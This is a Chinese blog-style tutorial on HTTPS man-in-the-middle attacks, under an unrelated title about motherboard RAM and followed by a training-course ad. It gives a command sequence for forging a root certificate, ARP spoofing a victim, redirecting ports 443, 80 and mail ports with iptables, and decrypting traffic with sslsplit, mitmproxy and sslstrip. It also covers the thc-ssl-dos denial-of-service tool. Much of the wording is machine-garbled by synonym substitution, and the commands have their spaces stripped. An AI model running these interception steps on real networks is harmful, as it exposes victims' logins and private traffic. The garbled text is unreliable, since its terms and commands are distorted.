主板支持8g内存装2根8g（一样平常主板能动员8g内存吗）「主板支持8g内存单条能插多大的」

　　HTTPS及HTTPS中心人攻击，全站HTTPS正在称为潮流趋势，国内实现全站https的有淘宝和百度两家。

　　https的作用

　　CIA：机密性，完备性，可用性（可用性是合法用户可以访问本身有权限访问的资源）办理的是信息传输中数据被窜改。

　　盗取加密：对称、非对称、单向

　　https工作原理

　　https的工作原理还是有须要研究下的（原理我也是从网上学习总结的，感谢这些先辈）

　　客户端发起HTTPS哀求

　　用户在欣赏器里输入一个https网址，然后毗连到server的443端口。

　　服务端的设置

　　采取HTTPS协议的服务器必须要有一套数字证书，可以本身制作，也可以向构造申请。区别就是本身颁发的证书必要客户端验证通过，才可以继承访问，而利用受信托的公司申请的证书则不会弹出提示页面web通讯中的SSL加密的公钥证书（受信托的第三方证书颁发机构署名颁发）常见的如

　　VeriSignThawte

　　GlobalSign

　　Symantec

　　传送证书

　　这个证书着实就是公钥，只是包罗了很多信息，如证书的颁发机构，逾期时间等等。

　　客户端分析证书

　　这部分工作是有客户端的TLS来完成的，起首会验证公钥是否有效，比如颁发机构，逾期时间等等，假如发现非常，则会弹出一个告诫框，提示证书存在题目。假如证书没有题目，那么就天生一个随即值。然后用证书对该随机值举行加密。

　　传送加密信息

　　这部分传送的是用证书加密后的随机值，目标就是让服务端得到这个随机值，以后客户端和服务端的通讯就可以通过这个随机值来举行加密解密了。

　　服务段解密信息

　　服务端用私钥解密后，得到了客户端传过来的随机值(私钥)，然后把内容通过该值举行对称加密。所谓对称加密就是，将信息和私钥通过某种算法肴杂在一起，如许除非知道私钥，否则无法获取内容，而恰好客户端和服务端都知道这个私钥，以是只要加密算法够彪悍，私钥够复杂，数据就够安全。

　　传输加密后的信息

　　这部分信息是服务段用私钥加密后的信息，可以在客户端被还原8.客户端解密信息客户端用之宿世成的私钥解密服务段传过来的信息，于是获取相识密后的内容。整个过程第三方纵然监听到了数据，也束手无策。

　　大概过程如下

握手——协商加密算法——得到公钥证书——验证公钥证书——互换会话密钥——加密信息传输

　　SSL的缺点

　　1.ssl是差别的对称、非对称、单向加密算法的组合加密实现（ciphersuite）如密钥互换、身份验证利用RAS/Diffie-Hellman，加密数据，利用AES加密，有RAS/DH完成密钥互换，择要信息由HMAC-SHA2，构成了一个ciphersuite，固然，也可以是其他组合。

　　2.服务器端为提供更好的兼容性，选择支持大量过期的ciphersuite。

　　3.协商过程中逼迫降级加密强度。

　　4.当代处理惩罚器盘算本领可以在吸取的时间内破解过期加密算法。

　　5.黑客购买云盘算资源破解。

　　HTTPS常见攻击方式

　　针对其缺点，常见的https攻击方法有

　　降级攻击（把高安全级别的加密算法逼迫降成低安全级别的加密算法）

　　解密攻击（明文、证书伪造）

　　协议弊端、实现方法的弊端、设置不严格

　　HTTPS证书查察

　　在举行中心人攻击之前，先查察下证书，可以利用以下软件（以百度为例）

　　OpenSSL

　　OpenSSL是一个安全套接字层暗码库，席卷重要的暗码算法、常用的密钥和证书封装管理功能及SSL协议，并提供丰富的应用程序供测试或别的目标利用。

　　直接调用openssl库辨认目标服务器支持的SSL/TLSciphersuiteopenssls_client-connectwww.baidu.com:443，

　　sslcan

　　SSLscan重要探测基于ssl的服务，如https。SSLscan是一款探测目标服务器所支持的SSL加密算法工具。

　　sslcan能主动辨认ssl设置错误，逾期协议，过期ciphersuite和hash算法默认会查抄CRIME、heartbled弊端，绿色表现安全、赤色黄色必要引起留意sslscan-tlsallwww.baidu.com:443

　　分析证书具体数据

　　sslscan-show-certificate--no-ciphersuiteswww.baidu.com:443

　　nmap

　　还可以利用nmap的脚本。

　　nmap--=ssl-enm-ciphers.nsewww.baidu.com

　　https中心人攻击

　　天赋生一个证书

　　opensslreq-new-x509-days1096-keyca.key-outca.crt，举行一个新的哀求，格式为-x509，如今的证书根本是x509的国际标准的证书格式，有效期为1096天，并利用ca.key私钥，天生ca.crt标准的证书文件。

　　sslsplit会主动的调用根证书，根据你要访问哪些网站，根据网站的名称，由根证书签发一个专门针对网站的证书。

　　开启路由功能

　　中心人也是个终端装备，不具有路由功能，转发过程不是由软件实现的，是由操纵体系的路由功能实现的。

　　sysctl-wnet.ipv4.ip_forward=1，将net.ipv4.ip_forward=1的值设为1，固然用输出重定向大概vim编辑proc/sys/net/ipv4/ip_forward也可。

　　写转发规则

　　iptables端口转发规则

　　当客户端把哀求发给中心人终端装备的时间，发到终端的443端口之后，必要用iptables做NAT地点转换，着实是端口转换，把本地443端口收到的包转发到别的一个端口，而别的一个端口由sslsplit所侦听的端口，如许的话，凡是发给443端口的哀求流量就会发给slsplit所侦听的端口，而sslsplit就会调用证书伪造一个看起来是目标网站的伪造网站，sslsplit会利用伪造的证书对发过来的流量举行解密

　　iptables-tnat-L查察net的设置，为克制干扰，可以利用iptables-F清空设置，并利用netstat-pantu|grep:80，netstat-pantu|grep:443查抄80和443是否被利用，利用则克制进程

　　将80、443端口举行转发给8080和8443端口。

　　iptables-tnat-APREROUTING-ptcp--dport80-jREDIRECT--to-ports8080

　　iptables-tnat-APREROUTING-ptcp--dport443-jREDIRECT--to-ports8443

　　固然还可以对其他的协议的加密流量举行中心人攻击。

　　iptables-tnat-APREROUTING-ptcp--dport587-jREDIRECT--to-ports8443//MSA

　　iptables-tnat-APREROUTING-ptcp--dport465-jREDIRECT--to-ports8443//SMTPS

　　iptables-tnat-APREROUTING-ptcp--dport993-jREDIRECT--to-ports8443//IMAPS

　　iptables-tnat-APREROUTING-ptcp--dport995-jREDIRECT--to-ports8443//POP3S

　　举行arp诱骗

　　利用arpspoof举行arp诱骗，不管是举行DNS诱骗还是HTTP或HTTPS的中心人攻击，arp诱骗都是条件，以是，在举行防御的时间，将ip和MAC绑定，就可以防止中心人攻击了。

　　arpspoof-ieth0-t192.168.1.127-r192.168.1.1（以下展示的实行环境的地点）

　　能看到网关的arp已经变成了kali的mac地点了。

　　举行监听

　　sslsplit-D-lconnect.log-j/root/test-Slogdir/-kca.key-cca.crtssl0.0.0.08443tcp0.0.0.08080，-D表现debug，-l表现把毗连哀求记录到一个文件中，不是数据信息，只是毗连信息，-j越狱的根目次，-S哀求的数据，放在-j指定的目次下的目次，如root/test/logdir，以是得先创建这个几个目次，-k指定私钥，-c指定私钥签发的证书，ssl的流量加密的流量在本地的全部ip地点侦听8443端口，不加密的平凡的tcp流量在本地的8080端口侦听。

　　验证

　　在客户端验证。本地电脑默认集成证书服务器的根证书，是不信托我们伪造的证书，以是在访问淘宝的时间，看到有如许的提示，就是有题目的。

　　登录验证并查察证书。

　　查察毗连信息。

　　查察数据信息。

　　查察到https加密后的信息已经被解密。

　　我们就可以挟制https的流量了，但是会提示网站证书会报错，办理方法是将根证书安装到客户端，再次访问就不会报根证书的题目了。访问的任何东西就会被没有告警的记录下来。以是在看到访问网站证书报错的环境下，必要格外留意。

　　除了sslsplit举行监听，还可以利用Mitmproxy举行中心人攻击，同前面的步调雷同，仍旧必要伪造证书，举行arp诱骗，但不必要指定监听的端口，默认监听8080端口，可以对默认的端口举行修改。

　　iptables-tnat-APREROUTING-ptcp--dport80-jREDIRECT--to-ports8080

　　iptables-tnat-APREROUTING-ptcp--dport443-jREDIRECT--to-ports8080

　　启动Mitmproxymitmproxy-T--host-wmitmproxy.log，不但能举行监控，每个具体的数据可以打开查察具体的哀求。

　　还可以利用SSLstrip举行监听，与前两种工具差别，将客户端到中心人的流量变为明文。必要arp诱骗，不必要天生伪造证书，只需写iptables规则，并让sslstrip监听某一个端口。

　　sslstrip-l8080

　　ssl/TLS拒绝服务攻击

　　ssl/TLS拒绝服务攻击的原理及特性：

　　1、SSL协商加密对性能开销增长，大量握手哀求会导致拒绝服务。

　　2、利用sslsevurerenegotiation特性，在单一TCP毗连中天生数千个SSL重毗连哀求，造成服务器资源过载。

　　3、与流量式拒绝服务攻击差别，thc-ssl-dos可以利用dsl线路打倒30G带宽的服务器

　　4、对SMTPS、POP3S等服务同样有效

　　可以利用德国黑客构造“TheHacker’sChoice”发布了工具THCSSLDOS、thc-ssl-dosip端口--accept，--accept是作者逼迫要求加的参数，不加此参数回提示你这个服务器是你的服务器吗，不是你的服务器就不要举行测试，--accept只有吸取确认是本身的服务器，才可以利用这个工具去发起ssl重毗连的握手哀求。

　　对策

　　禁用SSL-Renegotoation、利用SSLAccelerator（不外可以通过修改thc-ssl-dos代码，可以绕过以上对策）

　　作者：“罹殇”博客

　　泉源：https://wt7315.blog.51cto.com/10319657/1876945

炼石信息安全培训春季班开招

QQ：495066536

372806985

敬请连续关注……